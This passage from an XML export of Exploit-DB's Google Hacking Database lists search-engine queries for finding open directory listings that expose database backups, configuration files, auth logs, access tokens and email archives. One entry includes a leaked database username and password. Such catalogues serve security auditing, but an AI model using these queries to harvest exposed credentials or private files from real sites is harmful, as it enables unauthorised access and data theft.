<shortDescription>intitle:&quot;index of&quot; &quot;/api-debug.log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/api-debug.log&quot;
# Files Containing Juicy Info
# Date:11/08/2021
# Exploit Author: Chirag Samant</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/api-debug.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/api-debug.log&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Chirag Samant</author>
</entry>
<entry>
<id>7516</id>
<link>https://www.exploit-db.com/ghdb/7516</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/backup/sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/backup/sql&quot;
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: reza abasi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/backup/sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/backup/sql&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6008</id>
<link>https://www.exploit-db.com/ghdb/6008</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/config.bak&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/config.bak&quot;
This Google dork shows juicy information about the configuration files of
the website and some sensitive directories.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 3 May2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/config.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/config.bak&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>8289</id>
<link>https://www.exploit-db.com/ghdb/8289</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/config/prod/&quot;
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Suprit Pandurangi</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/config/prod/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/config/prod/&quot;</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Suprit Pandurangi</author>
</entry>
<entry>
<id>5957</id>
<link>https://www.exploit-db.com/ghdb/5957</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/cron.log&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/cron.log&quot;
This Google dork shows juicy information about the website and their
crontab logs.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 28 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/cron.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/cron.log&quot;</querystring>
<edb></edb>
<date>2020-04-28</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>7789</id>
<link>https://www.exploit-db.com/ghdb/7789</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/mysql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/mysql&quot;
# Files Containing Juicy Info
# Date:12/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/mysql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/mysql&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>5527</id>
<link>https://www.exploit-db.com/ghdb/5527</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/mysql.log&quot;</shortDescription>
<textualDescription>files containing juicy info:
intitle:&quot;index of&quot; &quot;/mysql.log&quot;
intitle:&quot;index of&quot; &quot;mail.log&quot;
site:*/log/error.log
intitle:&quot;index of&quot; &quot;ftp.log&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/mysql.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/mysql.log&quot;</querystring>
<edb></edb>
<date>2019-09-13</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7781</id>
<link>https://www.exploit-db.com/ghdb/7781</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/products&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/products&quot;
# Files Containing Juicy Info
# Date: 12/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/products&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/products&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7777</id>
<link>https://www.exploit-db.com/ghdb/7777</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/public/js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/public/js&quot;
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/public/js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/public/js&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7775</id>
<link>https://www.exploit-db.com/ghdb/7775</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/public_html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/public_html&quot;
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/public_html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/public_html&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7613</id>
<link>https://www.exploit-db.com/ghdb/7613</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/resources&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/resources&quot;
# Files Containing Juicy Info
# Date:4/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/resources&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/resources&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>7035</id>
<link>https://www.exploit-db.com/ghdb/7035</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/sql&quot;
# Files Containing Juicy Info
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/sql&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7728</id>
<link>https://www.exploit-db.com/ghdb/7728</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/students&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/students&quot;
# Files Containing Juicy Info
# Date: 09/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/students&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/students&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>8271</id>
<link>https://www.exploit-db.com/ghdb/8271</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/userlist/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/userlist/&quot;
# Files Containing Juicy Info
# Date: 20/10/2023
# Exploit Author: Md.Tariqul Islam Hasanat
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/userlist/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/userlist/&quot;</querystring>
<edb></edb>
<date>2023-10-20</date>
<author>Md.Tariqul Islam Hasanat</author>
</entry>
<entry>
<id>6010</id>
<link>https://www.exploit-db.com/ghdb/6010</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/users.xls&quot;</shortDescription>
<textualDescription>#Description : intitle:&quot;index of&quot; &quot;/users.xls&quot;
This Google dork shows juicy information about the website and their
usernames in excel format.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 3 May 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/users.xls&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/users.xls&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>7249</id>
<link>https://www.exploit-db.com/ghdb/7249</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/webpack-dev-server/ssl/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/webpack-dev-server/ssl/&quot;
# Files Containing Juicy info
# Date: 23/07/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/webpack-dev-server/ssl/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/webpack-dev-server/ssl/&quot;</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7254</id>
<link>https://www.exploit-db.com/ghdb/7254</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/wp-content/uploads/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/wp-content/uploads/&quot;
# Files Containing Juicy Info
# Date: 23/07/2021
# Exploit Author: Chrish</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/wp-content/uploads/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/wp-content/uploads/&quot;</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Chrish</author>
</entry>
<entry>
<id>6642</id>
<link>https://www.exploit-db.com/ghdb/6642</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/xampp/htdocs&quot; | &quot;C:/xampp/htdocs/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/xampp/htdocs&quot; | &quot;C:/xampp/htdocs/&quot;
# Sensitive directories.
# Date: 10/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/xampp/htdocs&quot; | &quot;C:/xampp/htdocs/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/xampp/htdocs&quot; | &quot;C:/xampp/htdocs/&quot;</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6009</id>
<link>https://www.exploit-db.com/ghdb/6009</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/yum.log&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/yum.log&quot;
This Google dork shows juicy information about the website and their yum
logs.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 3 May 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/yum.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/yum.log&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>8273</id>
<link>https://www.exploit-db.com/ghdb/8273</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;about-me&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;about-me&quot;
# Files Containing Juicy Info
# Date: 23/10/2023
# Exploit Safein Sadad</textualDescription>
<query>intitle:&quot;index of&quot; &quot;about-me&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;about-me&quot;</querystring>
<edb></edb>
<date>2023-10-23</date>
<author>Safein Sadad</author>
</entry>
<entry>
<id>5781</id>
<link>https://www.exploit-db.com/ghdb/5781</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;access_token&quot;</shortDescription>
<textualDescription>Category : Files Containing Juicy Info
intitle:&quot;index of&quot; &quot;access_token&quot;
By : Keval Sheth
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;access_token&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;access_token&quot;</querystring>
<edb></edb>
<date>2020-03-10</date>
<author>Keval Sheth</author>
</entry>
<entry>
<id>5999</id>
<link>https://www.exploit-db.com/ghdb/5999</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;accounts.json&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;index of&quot; &quot;accounts.json&quot;
intitle:&quot;index of&quot; &quot;accounts.rar&quot;
Description: This Google dork lists out account details stored in a file
named &quot;account.json&quot; for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;accounts.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;accounts.json&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7766</id>
<link>https://www.exploit-db.com/ghdb/7766</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin*.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin*.txt&quot;
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin*.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin*.txt&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7609</id>
<link>https://www.exploit-db.com/ghdb/7609</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin-config&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin-config&quot;
# Files Containing Juicy Info
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin-config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin-config&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7899</id>
<link>https://www.exploit-db.com/ghdb/7899</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin-shell&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin-shell&quot;
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin-shell&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin-shell&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>6001</id>
<link>https://www.exploit-db.com/ghdb/6001</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin.bak&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;admin.bak&quot;
Description: This Google dork lists out admin backup files for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin.bak&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7802</id>
<link>https://www.exploit-db.com/ghdb/7802</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin.js&quot;
# Files Containing Juicy Info
# Date:14/11/2021
# Exploit Author: Sabyasachi Paul</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin.js&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Sabyasachi Paul</author>
</entry>
<entry>
<id>6056</id>
<link>https://www.exploit-db.com/ghdb/6056</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin.jsp&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;admin.jsp&quot;
Description: This Google dork lists out sensitive admin java servlet pages
for a web server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin.jsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin.jsp&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7610</id>
<link>https://www.exploit-db.com/ghdb/7610</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin.login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin.login.php&quot;
# Files Containing Juicy Info
# Date: 03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin.login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin.login.php&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7611</id>
<link>https://www.exploit-db.com/ghdb/7611</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin.login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;admin.login.php&quot;
# Files Containing Juicy Info
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;admin.login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin.login.php&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6191</id>
<link>https://www.exploit-db.com/ghdb/6191</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;adminsubscribeack.txt&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;adminsubscribeack.txt&quot;
Description: This google dorks lists out sensitive admin subscription data
on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;adminsubscribeack.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;adminsubscribeack.txt&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8012</id>
<link>https://www.exploit-db.com/ghdb/8012</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;after.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;after.sh&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;after.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;after.sh&quot;</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>7815</id>
<link>https://www.exploit-db.com/ghdb/7815</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;apache.log&quot; | &quot;apache.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;apache.log&quot; | &quot;apache.logs&quot;
# Files Containing Juicy Info
# Date:15/11/2021
# Exploit Author: Pauras Patil</textualDescription>
<query>intitle:&quot;index of&quot; &quot;apache.log&quot; | &quot;apache.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;apache.log&quot; | &quot;apache.logs&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Pauras Patil</author>
</entry>
<entry>
<id>7688</id>
<link>https://www.exploit-db.com/ghdb/7688</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Apache/2.4.41 (Ubuntu) Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;Apache/2.4.41 (Ubuntu) Server&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Apache/2.4.41 (Ubuntu) Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Apache/2.4.41 (Ubuntu) Server&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7405</id>
<link>https://www.exploit-db.com/ghdb/7405</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;Apache/2.4.49&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;Apache/2.4.49&quot;
# Files Containing Juicy Info
# Date:08/10/2021
# Exploit Author: Shell Reaper</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;Apache/2.4.49&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;Apache/2.4.49&quot;</querystring>
<edb></edb>
<date>2021-10-08</date>
<author>Shell Reaper</author>
</entry>
<entry>
<id>6004</id>
<link>https://www.exploit-db.com/ghdb/6004</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;api.yaml&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;api.yaml&quot;
Description: This Google dork lists out sensitive api configuration data
stored in the &quot;api.yaml&quot; file for a website.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;api.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;api.yaml&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6766</id>
<link>https://www.exploit-db.com/ghdb/6766</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;application.properties&quot;</shortDescription>
<textualDescription>*Google Dork: intitle:&quot;index of&quot; &quot;application.properties&quot;*
*Exploit Author: Parth Shukla*
*Example: *
spring.mvc.view.prefix=/WEB-INF/views/spring.mvc.view.suffix=.jspspring.datasource.url=jdbc:mysql://localhost:3306/componente_c?allowPublicKeyRetrieval=true&amp;useSSL=falsespring.datasource.username=rootspring.datasource.password=KG3fi57HsauW9#
Thank you,
Parth Shukla
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;application.properties&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;application.properties&quot;</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Parth Shukla</author>
</entry>
<entry>
<id>5988</id>
<link>https://www.exploit-db.com/ghdb/5988</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;application.yml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;application.yml&quot;
# Juicy information and sensitive directories including in many case,
mostly secret tokens, user names and passwords.
# Date: 1/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;application.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;application.yml&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4013</id>
<link>https://www.exploit-db.com/ghdb/4013</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;archive.pst&quot; -contrib</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of&quot; &quot;archive.pst&quot; -contrib
Author: Sphearis
This dork allows you to see Outlook archive files stored in the open. These
files can be opened with a simple .pst viewer to read all emails it
contains.
The &quot;-contrib&quot; has been added to filter Cran installations which uses a
directory structure similar to the search terms.</textualDescription>
<query>intitle:&quot;index of&quot; &quot;archive.pst&quot; -contrib</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;archive.pst&quot; -contrib</querystring>
<edb></edb>
<date>2015-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6035</id>
<link>https://www.exploit-db.com/ghdb/6035</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;auth.asc&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;index of&quot; &quot;auth.asc&quot;
intitle:&quot;index of&quot; &quot;auth.txt&quot;
Description: This google dork lists out sensitive information regarding
authentication.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;auth.asc&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;auth.asc&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6206</id>
<link>https://www.exploit-db.com/ghdb/6206</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;auth.config&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;auth.config&quot;
Description: This google dorks lists out authentication config files on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;auth.config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;auth.config&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6020</id>
<link>https://www.exploit-db.com/ghdb/6020</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;auth.log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;auth.log&quot;
Description: This Google dork lists out sensitive auth logs stored in a
&quot;auth.log&quot; file for a linux web-server.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;auth.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;auth.log&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6204</id>
<link>https://www.exploit-db.com/ghdb/6204</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;auth_config.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;auth_config.php&quot;
Description: This google dorks lists out authentication config files on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;auth_config.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;auth_config.php&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6205</id>
<link>https://www.exploit-db.com/ghdb/6205</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;aws-config.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;aws-config.php&quot;
Description: This google dorks lists out aws config files on web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;aws-config.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;aws-config.php&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6058</id>
<link>https://www.exploit-db.com/ghdb/6058</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;backup-audio-queue.log&quot; OR &quot;backup-audio.log&quot; OR &quot;backup-mysql.log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;backup-audio-queue.log&quot; OR &quot;backup-audio.log&quot; OR &quot;backup-mysql.log&quot;
# Juicy information.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;backup-audio-queue.log&quot; OR &quot;backup-audio.log&quot; OR &quot;backup-mysql.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;backup-audio-queue.log&quot; OR &quot;backup-audio.log&quot; OR &quot;backup-mysql.log&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5795</id>
